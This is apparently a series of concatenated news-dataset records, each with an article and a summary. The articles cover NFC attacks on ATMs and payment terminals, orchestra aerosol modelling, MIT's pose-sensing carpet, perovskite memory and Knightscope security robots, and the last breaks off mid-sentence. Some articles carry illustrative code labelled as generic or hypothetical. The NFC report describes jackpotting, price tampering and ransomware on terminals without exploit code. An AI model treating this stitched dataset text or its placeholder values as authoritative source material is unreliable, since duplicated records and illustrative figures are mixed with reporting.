An Android app developed by IOActive's Josep Rodriguez exploits flaws in near-field communication (NFC) systems, enabling ATMs and a variety of point-of-sale terminals to be hacked by waving a smartphone over a contactless credit card reader. Rodriguez said his app was able to force at least one ATM brand to dispense cash, but only in combination with other flaws in the ATM's software. Rodriguez added that the point-of-sale vulnerabilities allow you to "modify the firmware and change the price to $1, for instance, even when the screen shows that you're paying $50. You can make the device useless, or install a kind of ransomware. There are a lot of possibilities here." The findings have been disclosed to the affected vendors, but Rodriguez acknowledged that physically patching hundreds of thousands of affected terminals and ATMs "would require a lot of time." For years, security researchers and cybercriminals have hacked ATMs by using all possible avenues to their innards, from opening a front panel and sticking a thumb drive into a USB port to drilling a hole that exposes internal wiring . Now one researcher has found a collection of bugs that allow him to hack ATMs - along with a wide variety of point-of-sale terminals - in a new way: with a wave of his phone over a contactless credit card reader. Josep Rodriguez, a researcher and consultant at security firm IOActive, has spent the last year digging up and reporting vulnerabilities in the so-called near-field communications reader chips used in millions of ATMs and point-of-sale systems worldwide. NFC systems are what let you wave a credit card over a reader - rather than swipe or insert it - to make a payment or extract money from a cash machine. You can find them on countless retail store and restaurant counters, vending machines, taxis, and parking meters around the globe. Now Rodriguez has built an Android app that allows his smartphone to mimic those credit card radio communications and exploit flaws in the NFC systems' firmware. With a wave of his phone, he can exploit a variety of bugs to crash point-of-sale devices, hack them to collect and transmit credit card data, invisibly change the value of transactions, and even lock the devices while displaying a ransomware message. Rodriguez says he can even force at least one brand of ATMs to dispense cash - though that "jackpotting" hack only works in combination with additional bugs he says he's found in the ATMs' software. He declined to specify or disclose those flaws publicly due to nondisclosure agreements with the ATM vendors. "You can modify the firmware and change the price to one dollar, for instance, even when the screen shows that you're paying 50 dollars. You can make the device useless, or install a kind of ransomware. There are a lot of possibilities here," says Rodriguez of the point-of-sale attacks he discovered. "If you chain the attack and also send a special payload to an ATM's computer, you can jackpot the ATM - like cash out, just by tapping your phone." Rodriguez says he alerted the affected vendors - which include ID Tech, Ingenico, Verifone, Crane Payment Innovations, BBPOS, Nexgo, and the unnamed ATM vendor - to his findings between 7 months and a year ago. Even so, he warns that the sheer number of affected systems and the fact that many point-of-sale terminals and ATMs don't regularly receive software updates - and in many cases require physical access to update - mean that many of those devices likely remain vulnerable. 
"Patching so many hundreds of thousands of ATMs physically, it's something that would require a lot of time," Rodriguez says. As a demonstration of those lingering vulnerabilities, Rodriguez shared a video with WIRED in which he waves a smartphone over the NFC reader of an ATM on the street in Madrid, where he lives, and causes the machine to display an error message. The NFC reader appears to crash, and no longer reads his credit card when he next touches it to the machine. (Rodriguez asked that WIRED not publish the video for fear of legal liability. He also didn't provide a video demo of a jackpotting attack because, he says, he could only legally test it on machines obtained as part of IOActive's security consulting to the affected ATM vendor, with whom IOActive has signed an NDA.) The findings are "excellent research into the vulnerability of software running on embedded devices," says Karsten Nohl, the founder of security firm SRLabs and a well-known firmware hacker, who reviewed Rodriguez's work. But Nohl points to a few drawbacks that reduce its practicality for real-world thieves. A hacked NFC reader would only be able to steal mag-stripe credit card data, not the victim's PIN or the data from EMV chips . And the fact that the ATM cashout trick would require an extra, distinct vulnerability in a target ATM's code is no small caveat, Nohl says.
193
Musical Chairs? Swapping Seats Could Reduce Orchestra Aerosols.
If musical instruments were people, trumpets would be super spreaders. When a trumpeter blows into the mouthpiece, tiny respiratory droplets, known as aerosols, travel out of the musician's mouth, whiz through the brass tubing and spray into the air. During a deadly pandemic, when a musician might unwittingly be exhaling an infectious virus, that poses a potential problem for orchestras. And the trumpet is not the only musical health hazard. "Wind instruments are like machines to aerosolize respiratory droplets," said Tony Saad, a chemical engineer and expert in computational fluid dynamics at the University of Utah. A simple but radical change - rearranging the musicians - could significantly reduce the aerosol buildup on stage, Dr. Saad and his colleagues reported in a new study , which was published in Science Advances on Wednesday.
Researchers at the University of Utah and the University of Minnesota (UMN) used a computer model to analyze aerosol accumulations in a concert hall to determine whether rearranging musicians could significantly reduce aerosol buildup on stage. The model mapped every air vent and the rate of airflow through the space's heating, ventilation, and air conditioning system, as well as the typical position of each member of the Utah Symphony. To simulate the spread of aerosols during a concert, the team incorporated UMN research that quantified the concentration and size of aerosol particles emitted by various wind instruments. By applying computational fluid dynamics simulations to model the flow of air and aerosols through the hall when all musicians were playing, the researchers determined that orchestras can reduce the risk of aerosol spread by placing the highest-risk instruments near open doors and air return vents.
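The study itself couples a detailed HVAC airflow model of the hall with aerosol source terms for each instrument. As a rough, generic illustration of the underlying idea (not the authors' code), the sketch below advects and diffuses a 2-D aerosol concentration field toward an air-return boundary with a simple explicit finite-difference scheme; the grid size, airflow speed, and source positions are invented for illustration.

```python
import numpy as np

# Minimal 2-D advection-diffusion sketch of aerosol transport on a stage.
# Grid, airflow, and source locations are illustrative, not the study's model.
NX, NY = 60, 40      # grid cells
DX = 0.5             # cell size (m)
DT = 0.05            # time step (s)
DIFF = 1e-3          # effective diffusivity (m^2/s)
U = 0.2              # uniform airflow toward +x (m/s), e.g. toward a return vent

c = np.zeros((NY, NX))                  # aerosol concentration field
sources = [(20, 10), (22, 10)]          # hypothetical wind-player positions (row, col)
EMISSION = 1.0                          # arbitrary emission rate per step

def step(c):
    # upwind advection (U > 0) plus central-difference diffusion, explicit Euler
    grad_x = (c - np.roll(c, 1, axis=1)) / DX
    lap = (np.roll(c, 1, 0) + np.roll(c, -1, 0) +
           np.roll(c, 1, 1) + np.roll(c, -1, 1) - 4 * c) / DX ** 2
    c = c + DT * (-U * grad_x + DIFF * lap)
    for r, col in sources:
        c[r, col] += EMISSION * DT      # continuous emission from the players
    c[:, -1] = 0.0                      # air-return boundary removes aerosol
    c[:, 0] = 0.0                       # clean air enters upstream
    return c

for _ in range(2000):                   # roughly 100 s of simulated time
    c = step(c)

print("peak on-stage concentration:", round(float(c.max()), 3))
```

In this toy setup, moving the sources closer to the removal boundary lowers the steady-state concentration elsewhere on the grid, which is the qualitative effect the proposed seating rearrangement relies on.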
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the University of Utah and the University of Minnesota (UMN) used a computer model to analyze aerosol accumulations in a concert hall to determine whether rearranging musicians could significantly reduce aerosol buildup on stage. The model mapped every air vent and the rate of airflow through the space's heating, ventilation, and air conditioning system, as well as the typical position of each member of the Utah Symphony. To simulate the spread of aerosols during a concert, the team incorporated UMN research that quantified the concentration and size of aerosol particles emitted by various wind instruments. By applying computational fluid dynamics simulations to model the flow of air and aerosols through the hall when all musicians were playing, the researchers determined that orchestras can reduce the risk of aerosol spread by placing the highest-risk instruments near open doors and air return vents. If musical instruments were people, trumpets would be super spreaders. When a trumpeter blows into the mouthpiece, tiny respiratory droplets, known as aerosols, travel out of the musician's mouth, whiz through the brass tubing and spray into the air. During a deadly pandemic, when a musician might unwittingly be exhaling an infectious virus, that poses a potential problem for orchestras. And the trumpet is not the only musical health hazard. "Wind instruments are like machines to aerosolize respiratory droplets," said Tony Saad, a chemical engineer and expert in computational fluid dynamics at the University of Utah. A simple but radical change - rearranging the musicians - could significantly reduce the aerosol buildup on stage, Dr. Saad and his colleagues reported in a new study , which was published in Science Advances on Wednesday.
194
Intelligent Carpet Gives Insight into Human Poses
The sentient Magic Carpet from Aladdin might have a new competitor. While it can't fly or speak, a new tactile sensing carpet from MIT's Computer Science and Artificial Intelligence Laboratory (CSAIL) can estimate human poses without using cameras, in a step towards improving self-powered personalized healthcare, smart homes, and gaming. Many of our daily activities involve physical contact with the ground: walking, exercising, or resting. These embedded interactions contain a wealth of information that helps us better understand people's movements. Previous research has leveraged single RGB cameras (think Microsoft Kinect), wearable omnidirectional cameras , and even plain old off-the-shelf webcams, but with the inevitable byproducts of camera occlusions and privacy concerns. The CSAIL team's system only used cameras to create the dataset the system was trained on, and only captured the moment of the person performing the activity. To infer the 3-D pose, a person would simply have to get on the carpet, perform an action, and then the team's deep neural network, using just the tactile information, could determine if the person was doing sit-ups, stretching, or doing another action. "You can imagine leveraging this model to enable a seamless health monitoring system for high-risk individuals, for fall detection, rehab monitoring, mobility, and more," says Yiyue Luo, a lead author on a paper about the carpet. The carpet itself, which is low cost and scalable, was made of commercial, pressure-sensitive film and conductive thread, with over nine thousand sensors spanning thirty-six by two feet. (Most living room rug sizes are eight by ten or nine by twelve.) Each of the sensors on the carpet converts the human's pressure into an electrical signal, through the physical contact between people's feet, limbs, torso, and the carpet. The system was specifically trained on synchronized tactile and visual data, such as a video and corresponding heatmap of someone doing a push-up. The model takes the pose extracted from the visual data as the ground truth, uses the tactile data as input, and finally outputs the 3-D human pose. In practice, this means that after a person steps onto the carpet and does a set of push-ups, the system can produce an image or video of someone doing a push-up. In fact, the model was able to predict a person's pose with an error margin (measured by the distance between predicted human body key points and ground truth key points) of less than ten centimeters. For classifying specific actions, the system was accurate 97 percent of the time. "You may envision using the carpet for workout purposes. Based solely on tactile information, it can recognize the activity, count the number of reps, and calculate the amount of burned calories," says Yunzhu Li, a co-author on the paper. Since much of the pressure distribution was prompted by movement of the lower body and torso, that information was more accurate than the upper body data. Also, the model was unable to predict poses without more explicit floor contact, like free-floating legs during sit-ups, or a twisted torso while standing up. While the system can understand a single person, the scientists, down the line, want to improve the metrics for multiple users, where two people might be dancing or hugging on the carpet. They also hope to gain more information from the tactile signals, such as a person's height or weight.
Luo wrote the paper alongside MIT CSAIL PhD students Yunzhu Li and Pratyusha Sharma, MIT CSAIL mechanical engineer Michael Foshey, MIT CSAIL postdoc Wan Shou, and MIT professors Tomas Palacios, Antonio Torralba, and Wojciech Matusik. The work is funded by the Toyota Research Institute.
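As described above, the model treats camera-derived 3-D keypoints as ground truth and the carpet's pressure maps as input. The sketch below is a deliberately simplified stand-in rather than the CSAIL architecture: a small convolutional encoder over a single pressure frame that regresses a fixed set of 3-D keypoints with a mean-squared-error loss. The sensor-grid resolution and keypoint count are assumptions made for illustration.

```python
import torch
import torch.nn as nn

# Illustrative stand-in for a tactile-to-pose regressor, not the CSAIL model.
# Input: one pressure map from the carpet; output: K 3-D body keypoints.
GRID_H, GRID_W = 96, 96   # assumed sensor-grid resolution
K = 21                    # assumed number of body keypoints

class TactilePoseNet(nn.Module):
    def __init__(self):
        super().__init__()
        self.encoder = nn.Sequential(
            nn.Conv2d(1, 16, 3, stride=2, padding=1), nn.ReLU(),
            nn.Conv2d(16, 32, 3, stride=2, padding=1), nn.ReLU(),
            nn.Conv2d(32, 64, 3, stride=2, padding=1), nn.ReLU(),
            nn.AdaptiveAvgPool2d(1),
        )
        self.head = nn.Linear(64, K * 3)    # regress x, y, z per keypoint

    def forward(self, pressure):            # pressure: (B, 1, H, W)
        feat = self.encoder(pressure).flatten(1)
        return self.head(feat).view(-1, K, 3)

model = TactilePoseNet()
opt = torch.optim.Adam(model.parameters(), lr=1e-3)
loss_fn = nn.MSELoss()

# One mock training step: camera-derived keypoints act as ground truth.
pressure = torch.rand(8, 1, GRID_H, GRID_W)     # batch of tactile frames
gt_keypoints = torch.rand(8, K, 3)              # from the synchronized camera
opt.zero_grad()
pred = model(pressure)
loss = loss_fn(pred, gt_keypoints)
loss.backward()
opt.step()
print("training loss:", loss.item())
```

At inference time only the pressure maps are needed, which is what lets the carpet estimate poses without any camera in the loop.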
A new tactile sensing carpet assembled from pressure-sensitive film and conductive thread is able to calculate human poses without cameras. Built by engineers at the Massachusetts Institute of Technology (MIT) 's Computer Science and Artificial Intelligence Laboratory, the system's neural network was trained on a dataset of camera-recorded poses; when a person performs an action on the carpet, it can infer the three-dimensional pose from tactile data. More than 9,000 sensors are woven into the carpet, and convert the pressure of a person's feet on the carpet into an electrical signal. The computational model could predict a pose with a less-than-10-centimeter error margin, and classify specific actions with 97% accuracy. MIT's Yiyue Luo said, "You can imagine leveraging this model to enable a seamless health monitoring system for high-risk individuals, for fall detection, rehab monitoring, mobility, and more."
[]
[]
[]
scitechnews
None
None
None
None
A new tactile sensing carpet assembled from pressure-sensitive film and conductive thread is able to calculate human poses without cameras. Built by engineers at the Massachusetts Institute of Technology (MIT) 's Computer Science and Artificial Intelligence Laboratory, the system's neural network was trained on a dataset of camera-recorded poses; when a person performs an action on the carpet, it can infer the three-dimensional pose from tactile data. More than 9,000 sensors are woven into the carpet, and convert the pressure of a person's feet on the carpet into an electrical signal. The computational model could predict a pose with a less-than-10-centimeter error margin, and classify specific actions with 97% accuracy. MIT's Yiyue Luo said, "You can imagine leveraging this model to enable a seamless health monitoring system for high-risk individuals, for fall detection, rehab monitoring, mobility, and more." The sentient Magic Carpet from Aladdin might have a new competitor. While it can't fly or speak, a new tactile sensing carpet from MIT's Computer Science and Artificial Intelligence Laboratory (CSAIL) can estimate human poses without using cameras, in a step towards improving self-powered personalized healthcare, smart homes, and gaming. Many of our daily activities involve physical contact with the ground: walking, exercising, or resting. These embedded interactions contain a wealth of information that help us better understand people's movements. Previous research has leveraged use of single RGB cameras , (think Microsoft Kinect), wearable omnidirectional cameras , and even plain old off the shelf webcams, but with the inevitable byproducts of camera occlusions and privacy concerns. The CSAIL team's system only used cameras to create the dataset the system was trained on, and only captured the moment of the person performing the activity. To infer the 3-D pose, a person would simply have to get on the carpet, perform an action, and then the team's deep neural network, using just the tactile information, could determine if the person was doing sit-ups, stretching, or doing another action. "You can imagine leveraging this model to enable a seamless health monitoring system for high-risk individuals, for fall detection, rehab monitoring, mobility, and more," says Yiyue Luo, a lead author on a paper about the carpet. The carpet itself, which is low cost and scalable, was made of commercial, pressure-sensitive film and conductive thread, with over nine thousand sensors spanning thirty six by two feet. (Most living room rug sizes are eight by ten or nine by twelve.) Each of the sensors on the carpet convert the human's pressure into an electrical signal, through the physical contact between people's feet, limbs, torso, and the carpet. The system was specifically trained on synchronized tactile and visual data, such as a video and corresponding heatmap of someone doing a pushup. The model takes the pose extracted from the visual data as the ground truth, uses the tactile data as input, and finally outputs the 3-D human pose. This might look something like, when, after stepping onto the carpet, and doing a set up of pushups, the system is able to produce an image or video of someone doing a push-up. In fact, the model was able to predict a person's pose with an error margin (measured by the distance between predicted human body key points and ground truth key points) by less than ten centimeters. For classifying specific actions, the system was accurate 97 percent of the time. 
"You may envision using the carpet for workout purposes. Based solely on tactile information, it can recognize the activity, count the number of reps, and calculate the amount of burned calories." says Yunzhu Li, a co-author on the paper. Since much of the pressure distributions were prompted by movement of the lower body and torso, that information was more accurate than the upper body data. Also, the model was unable to predict poses without more explicit floor contact, like free-floating legs during sit-ups, or a twisted torso while standing up. While the system can understand a single person, the scientists, down the line, want to improve the metrics for multiple users, where two people might be dancing or hugging on the carpet. They also hope to gain more information from the tactical signals, such as a person's height or weight. Luo wrote the paper alongside MIT CSAIL PhD students Yunzhu Li and Pratyusha Sharma, MIT CSAIL mechanical engineer Michael Foshey, MIT CSAIL postdoc Wan Shou, and MIT professors Tomas Palacios, Antonio Torralba, and Wojciech Matusik. The work is funded by the Toyota Research Institute.
195
Perovskite Memory Devices with Ultra-Fast Switching Speed
A halide perovskite-based memory that can overcome slow switching speeds has been developed by researchers at South Korea's Pohang University of Science and Technology (POSTECH). The team selected the compound Cs3Sb2I9 from 696 candidate halide perovskite compounds and used it to fabricate memory devices, which they ran at a switching speed of 20 nanoseconds, a roughly 100-fold speedup from memory devices using layer-structured Cs3Sb2I9. POSTECH's Jang-Sik Lee said, "This study provides an important step toward the development of resistive switching memory that can be operated at an ultra-fast switching speed. This work offers an opportunity to design new materials for memory devices based on calculations and experimental verification."
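The selection of Cs3Sb2I9 out of 696 candidates was driven by calculations before any devices were fabricated. As a generic illustration of how such a calculation-driven screen can be organized (the property names and cutoffs below are hypothetical, not POSTECH's actual criteria), a shortlist can be produced by filtering computed properties:

```python
# Generic shape of a computational materials screen; the properties and
# cutoffs here are hypothetical, not the POSTECH selection criteria.
candidates = [
    {"formula": "Cs3Sb2I9", "band_gap_eV": 2.0, "defect_formation_eV": 0.9},
    {"formula": "Cs3Bi2I9", "band_gap_eV": 2.1, "defect_formation_eV": 1.4},
    # ... remaining candidate entries from first-principles calculations
]

def passes_screen(material):
    # keep compounds whose computed properties suggest fast, stable switching
    return (1.5 <= material["band_gap_eV"] <= 2.5
            and material["defect_formation_eV"] < 1.0)

shortlist = [m["formula"] for m in candidates if passes_screen(m)]
print(shortlist)   # candidates to fabricate and verify experimentally
```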
[]
[]
[]
scitechnews
None
None
None
None
A halide perovskite-based memory that can overcome slow switching speeds has been developed by researchers at South Korea's Pohang University of Science and Technology (POSTECH). The team selected the compound Cs3Sb2I9 from 696 candidate halide perovskite compounds and used it to fabricate memory devices, which they ran at a switching speed of 20 nanoseconds, a roughly 100-fold speedup from memory devices using layer-structured Cs3Sb2I9. POSTECH's Jang-Sik Lee said, "This study provides an important step toward the development of resistive switching memory that can be operated at an ultra-fast switching speed. This work offers an opportunity to design new materials for memory devices based on calculations and experimental verification."
196
Security Robots Expand Across U.S., with Few Tangible Results
When the Westland Real Estate Group bought Liberty Village, a sprawling 1,000-unit apartment complex on the northeastern edge of Las Vegas nearly two years ago, the police department identified it as one of the city's most frequent sources of 911 calls. "There was a little bit of everything," said Dena Lerner, a spokeswoman for Westland. "A lot of gang activity that revolved around controlled substances, prostitution, dog rings. We had issues with gun rings, drive-by shootings, robberies, assaults - we're talking everything." So earlier this year, Westland introduced a broader program to reduce crime and added an "autonomous security robot" manufactured by Knightscope, a Silicon Valley company, to make the complex safer. Each robot is given a nickname, and the one roaming around Liberty Village is called "Westy." This model, K5, is a conical, bulky, artificial intelligence-powered robot that stands just over 5 feet tall. Westy slowly roams around at about a human walking speed, with four internal cameras capturing a constant 360-degree view. It also can scan and record license plates and unique digital identifiers that every cellphone broadcasts, known as MAC addresses. But it's unclear how much Westy has reduced crime at Liberty Village. Knightscope, which is eagerly trying to recruit new clients, told local news outlets that Westy had resulted in a "significant drop in 911 calls," underscoring "yet another crime-fighting win." Knightscope included articles about Westy as part of its recent pitch to individual investors and in its plans to take the company public . Officer Aden Ocampo-Gomez, a spokesman for the Las Vegas Metropolitan Police Department, said that while the complex is no longer in the agency's top 10 list for most frequent 911 calls in the northeastern part of the Las Vegas Valley, he doesn't think all the credit should go to Westy. "I cannot say it was due to the robot," he said. As more government agencies and private sector companies resort to robots to help fight crime, the jury is still out on how effective they are at actually reducing it. Knightscope, which experts say is the dominant player in this market, has cited little public evidence that its robots have reduced crime as the company deploys them everywhere from a Georgia shopping mall to an Arizona development to a Nevada casino . Knightscope's clients also don't know how much these security robots help. "Are we seeing dramatic changes since we deployed the robot in January?" Lerner, the Westland spokesperson, said. "No. But I do believe it is a great tool to keep a community as large as this, to keep it safer, to keep it controlled." For its part, Knightscope maintains on its website that the robots "predict and prevent crime," without much evidence that they do so. Experts say this is a bold claim. "It would be difficult to introduce a single thing and it causes crime to go down," said Ryan Calo , a law professor at the University of Washington, comparing the Knightscope robots to a "roving scarecrow." Additionally, the company does not provide specific, detailed examples of crimes that have been thwarted due to the robots. "I definitely say that we are making a difference," said Stacy Stephens, Knightscope's co-founder and executive vice president. "You don't know what might have happened compared to deploying a security guard out there." 
The company's CEO, William Li, founded Knightscope after trying to come up with a response to the December 2012 mass shooting at Sandy Hook Elementary School in Connecticut that left 20 young children dead. "That infuriated me," Li, a former Ford executive, told USA Today in January 2014. The company came up with a robot that would "predict and prevent crime in your community," according to an archived version of its website. "There are 7 billion people on the planet, and we'll soon have a few billion more, and law enforcement is not going to scale at the same rate; we literally can't afford it," Li said. Since then, Knightscope robots have become the crime-fighting friend of corporate clients in various cities nationwide, including Honolulu, Washington, D.C. and a community college in Tucson, Arizona . Typically, a casino, residential facility, bank or, in one case, a police department, rents a robot for an average fee of around $70,000 to $80,000 per year. Part of that cost involves Knightscope storing all of the data that robots like Westy gather in a year. This huge volume of data is the equivalent of more than the combined storage of 175 iPhones, each with the maximum storage capacity of 512 gigabytes. According to Knightscope's most recent annual report , the company has a current fleet of 52 machines used across 23 clients, with a backlog of 27 more robots to deliver. Each robot has an expected life span of "three to four and a half years." But the finances of the police robot business are difficult. Last year, Knightscope lost more money than ever, with a $19.3 million net loss, nearly double from 2019. While some clients are buying more robots, the company's overall number of clients fell to 23, from 30, in the past four years. Plus, the number of robots leased has plateaued at 52 from the end of 2018 through the end of last year. The pandemic certainly didn't help things. Just two months ago, Knightscope told investors that there was "substantial doubt regarding our ability to continue " given the company's "accumulated deficit," or debt, of over $69 million as of the end of 2020. Its operating expenses jumped by more than 50 percent, including a small increase in research spending and a doubling of the company's marketing budget. Knightscope itself recently told investors that absent additional fundraising efforts, it will "not be solvent after the third quarter of 2022." Stephens, Knightscope's co-founder, said that the company's client retention rate is 85 percent, and that the company has clients that have renewed for four years. "I can't comment on future rounds of funding. But we have been through seven rounds of funding to date," he said. "We've been able to advance the technology each time, and we have been able to grow the revenue side each time as well." Knightscope's best-known deployment is in Huntington Park, California, a small city south of downtown Los Angeles. The Huntington Park Police Department was the first law enforcement agency to partner directly with Knightscope. For two years, a single Knightscope robot, dubbed " HP RoboCop ," has roamed part of the city's Salt Lake Park. The robot captures constant video of park activity, and has the ability to broadcast back to police live, although the Huntington Park Police Department does not use this feature often. As recently as May 2020, the Huntington Park Police Department presented statistics to the City Council comparing a five-month period, from June to December, in 2018 and in 2019. 
The data shows that "crime or incident reports" went down, from 48 to 26, and arrests went up, from 11 to 14. "The K-5 robot is having a positive impact on crime and nuisance activity at Salt Lake Park, which is reducing the instances of police activity at the park," both the city manager, Ricardo Reyes, and the chief of police, Cosme Lozano, wrote to local lawmakers last year. In a recent interview, Lozano called the robot's presence a "positive result" and sees "no downside" in having it. But the department does not even use all of the robot's abilities, according to Lozano. The police can't monitor the robot's live video on a constant basis because that would "burn through" the 100 gigabytes of data that the agency has allotted to it per month, similar to a data cap on a monthly cellphone plan. Lozano added that the Huntington Park Police Department also does not use the license plate reader, thermal scanning or mobile phone scanning features, as they have not been adequately evaluated by the police department yet. When asked to cite examples of arrests that were made because of the robot over the two years since it was deployed, Lozano said there haven't been many. "I want to say that it's been useful in robot tipping and vandalism against the robot itself," he said, noting that this has only occurred twice in two years. Nevertheless, Lozano said he will recommend that the city renew the contract again when it comes before the City Council, which is expected in coming weeks. As Knightscope has expanded, it has been involved in both tragic and comical episodes. In 2016, a K5 roaming around Stanford Shopping Center in Palo Alto, California, hit a 16-month-old toddler, bruising his leg and running over his foot. The company apologized , calling it a "freakish accident," and invited the family to visit the company's nearby headquarters in Mountain View, which the family declined . The following year, another K5 robot slipped on steps adjacent to a fountain at the Washington Harbour development in Washington, D.C., falling into the water. In October 2019, a Huntington Park woman, Cogo Guebara, told NBC News that she tried reporting a fistfight by pressing an emergency alert button on the HP RoboCop itself, but to no avail. She learned later the emergency button was not yet connected to the police department itself. Knightscope once promoted several clients in California, including the NBA's Sacramento Kings, the city of Hayward, and the Westfield Valley Fair Mall in Santa Clara, not far from the robot company's headquarters. But those clients say that they no longer have contracts with Knightscope. Hayward dispatched its robot in a city parking garage in 2018. The following year, a man attacked and knocked over the robot. Despite having clear video and photographic evidence of the alleged crime , no one was arrested, according to Adam Kostrzak, the city's chief information officer. However, last year, Hayward did not renew the annual contract with Knightscope "due to the financial impact of Covid-19 in early 2020," Kostrzak emailed. The city spent over $137,000 over two years on the robot. When asked whether the city had seen any concrete evidence of a crime reduction from the robot, Kostrzak did not provide any. "It did successfully navigate the garage, technical hiccups were minimal as well as our residents and staff appreciated its presence," he emailed. 
"Had the robot contract been renewed, the second step would have been to expand into the [detailed] crime statistics for the area covered by the robot with our Police Department, unfortunately the onset of Covid-19 halted this plan." The Huntington Park and Las Vegas robots are the only specific examples named on the company's website that have allegedly contributed to a reduction in crime. But that's because Stephens, the company VP, said that nearly all of his company's clients do not want the details of any crime-related incidents to be made public. Ultimately, law enforcement and legal experts say that it is difficult for any firm to show that a given piece of technology definitively results in a reduction in crime. Andrew Ferguson , a law professor at American University, called these robots an "expensive version of security theater," using a term for procedures that aim to make an environment more secure, but do not always have that demonstrable effect. "This is an obviously noticeable surveillance device that is meant for you to look and stop and realize that you are under surveillance and that would deter you," he said. "They are slow, they don't do anything besides record a lot of data." One of the best uses for a robot may be what one community college in Arizona has tried. They're using the robot as a technological demonstration, and "less of a security tool." Libby Howell, a spokeswoman for Pima Community College in Tucson, noted that this model does not use the facial recognition feature, because that had raised concerns among faculty and students, many of whom are Dreamers, or immigrants brought to the United States as young children, who conceivably could be deported. "It's not trying to solve a problem," Howell said. "It's trying to show students that technology is changing by leaps and bounds every day, and what you are majoring in today could have application tomorrow." But Knightscope's users remain hopeful that these police robots will make a difference. Robert Krauss, the vice president of public safety at the Pechanga Resort Casino, about an hour's drive north of San Diego, said that in the past three years the casino has used one robot to roam the casino floor and five robots to stand next to human security at the casino's main entrances. He doesn't know how useful they have been in terms of stopping crime, but said that the robots have been able to identify panhandlers and other people that the casino wants to exclude. Once, video from a robot even staved off a potential slip-and-fall civil lawsuit by providing clear-cut footage of a woman who fell and claimed the casino was at fault. "You never know how many [bad actors] you've prevented by placing [the robots] there, so I don't know what we've prevented. But I can tell you we've never had anything serious," Krauss said, noting that many customers just like taking pictures with them. "Going forward, I will probably add one or two more."
Concrete proof that security robots are reducing crime is lacking, despite wider deployment by U.S. government agencies and the private sector. Although it claims its robots "predict and prevent crime," U.S. security robot supplier Knightscope cites little public evidence that its products work, or specific cases of crimes they have foiled; its clients are similarly unaware of how effective the robots are. Huntington Park, CA's police department deployed a K5 model from Knightscope to patrol a local park; Huntington Park chief of police Cosme Lozano said that in the two years since the robot's deployment, it was most useful in recording evidence of "robot tipping and vandalism against the robot itself." Law enforcement and legal experts say demonstrating that a given piece of technology clearly results in a reduction in crime is difficult, with American University's Andrew Ferguson calling crime-fighting robots an "expensive version of security theater."
[]
[]
[]
scitechnews
None
None
None
None
Concrete proof that security robots are reducing crime is lacking, despite wider deployment by U.S. government agencies and the private sector. Despite claims that its robots "predict and prevent crime," U.S. security robot supplier Knightscope cites little public evidence that its products work, or specific cases of crimes they have foiled; its clients are similarly unaware of how effective the robots are. Huntington Park, CA's police department deployed a K5 model from Knightscope to patrol a local park; Huntington Park chief of police Cozme Lozano said in the two years since the robot's deployment, it was most useful in recording evidence of "robot tipping and vandalism against the robot itself." Law enforcement and legal experts say demonstrating that a given piece of technology clearly results in a reduction in crime is difficult, with American University's Andrew Ferguson calling crime-fighting robots an "expensive version of security theater." When the Westland Real Estate Group bought Liberty Village, a sprawling 1,000-unit apartment complex on the northeastern edge of Las Vegas nearly two years ago, the police department identified it as one of the city's most frequent sources of 911 calls. "There was a little bit of everything," said Dena Lerner, a spokeswoman for Westland. "A lot of gang activity that revolved around controlled substances, prostitution, dog rings. We had issues with gun rings, drive-by shootings, robberies, assaults - we're talking everything." So earlier this year, Westland introduced a broader program to reduce crime and added an "autonomous security robot" manufactured by Knightscope, a Silicon Valley company to make the complex safer. Each robot is given a nickname, and the one roaming around Liberty Village is called "Westy." This model, K5, is a conical, bulky, artificial intelligence-powered robot that stands just over 5 feet tall. Westy slowly roams around at about a human walking speed, with four internal cameras capturing a constant 360-degree view. It also can scan and record license plates and unique digital identifiers that every cellphone broadcasts, known as MAC addresses. But it's unclear how much Westy has reduced crime at Liberty Village. Knightscope, which is eagerly trying to recruit new clients, told local news outlets that Westy had resulted in a "significant drop in 911 calls," underscoring "yet another crime-fighting win." Knightscope included articles about Westy as part of its recent pitch to individual investors and in its plans to take the company public . Officer Aden Ocampo-Gomez, a spokesman for the Las Vegas Metropolitan Police Department, said that while the complex is no longer in the agency's top 10 list for most frequent 911 calls in the northeastern part of the Las Vegas Valley, he doesn't think all the credit should go to Westy. "I cannot say it was due to the robot," he said. As more government agencies and private sector companies resort to robots to help fight crime, the verdict is out about how effective they are in actually reducing it. Knightscope, which experts say is the dominant player in this market, has cited little public evidence that its robots have reduced crime as the company deploys them everywhere from a Georgia shopping mall to an Arizona development to a Nevada casino . Knightscope's clients also don't know how much these security robots help. "Are we seeing dramatic changes since we deployed the robot in January?" Lerner, the Westland spokesperson said. "No. 
But I do believe it is a great tool to keep a community as large as this, to keep it safer, to keep it controlled." For its part, Knightscope maintains on its website that the robots "predict and prevent crime," without much evidence that they do so. Experts say this is a bold claim. "It would be difficult to introduce a single thing and it causes crime to go down," said Ryan Calo , a law professor at the University of Washington, comparing the Knightscope robots to a "roving scarecrow." Additionally, the company does not provide specific, detailed examples of crimes that have been thwarted due to the robots. "I definitely say that we are making a difference," said Stacy Stephens, Knightscope's co-founder and executive vice president. "You don't know what might have happened compared to deploying a security guard out there." The company's CEO, William Li, founded Knightscope after trying to come up with a response to the December 2012 mass shooting at Sandy Hook Elementary School in Connecticut that left 20 young children dead. "That infuriated me," Li, a former Ford executive, told USA Today in January 2014. The company came up with a robot that would "predict and prevent crime in your community," according to an archived version of its website. "There are 7 billion people on the planet, and we'll soon have a few billion more, and law enforcement is not going to scale at the same rate; we literally can't afford it," Li said. Since then Knightscope robots have become the crime-fighting friend of corporate clients in various cities nationwide, including Honolulu, Washington, D.C. and a community college in Tucson, Arizona . Typically, a casino, residential facility, bank or, in one case, a police department, rents a robot for an average fee of around $70,000 to $80,000 per year. Part of that cost involves Knightscope storing all of the data that robots like Westy gather in a year. This huge volume of data is the equivalent of more than the combined storage of 175 iPhones, each with the maximum storage capacity of 512 gigabytes. According to Knightscope's most recent annual report , the company has a current fleet of 52 machines used across 23 clients, with a backlog of 27 more robots to deliver. Each robot has an expected life span of "three to four and a half years." But the finances behind the police robot business is a difficult one. Last year, Knightscope lost more money than ever, with a $19.3 million net loss, nearly double from 2019. While some clients are buying more robots, the company's overall number of clients fell to 23, from 30, in the past four years. Plus, the number of robots leased has plateaued at 52 from the end of 2018 through the end of last year. The pandemic certainly didn't help things. Just two months ago, Knightscope told investors that there was "substantial doubt regarding our ability to continue " given the company's "accumulated deficit," or debt, of over $69 million as of the end of 2020. Its operating expenses jumped by more than 50 percent, including a small increase on research, and a doubling of the 